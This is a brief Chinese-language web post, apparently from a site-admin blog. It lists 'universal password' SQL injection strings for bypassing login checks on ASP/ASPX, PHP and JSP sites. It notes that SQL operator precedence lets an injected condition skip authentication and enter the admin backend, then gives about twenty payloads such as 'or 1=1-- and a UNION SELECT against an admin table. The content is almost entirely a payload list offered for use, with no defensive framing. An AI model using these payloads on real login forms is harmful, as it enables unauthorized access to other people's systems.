优先级:NOT > AND > OR 导致注入漏洞可以饶过sql判断语句,直接进入后台。

asp aspx万能密码

1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:   1 or '1'='1'=1
12:   1 or '1'='1' or 1=1
13:   'OR 1=1%00
14:   "or 1=1%00
15: 'xor 
16:   用户名   ' UNION Select 1,1,1 FROM admin Where ''='     (替换表名admin)
密码 1

PHP万能密码
'or 1=1/*


jsp 万能密码
1'or'1'='1

文章如转载,请注明转载自:http://www.5iadmin.com/post/991.html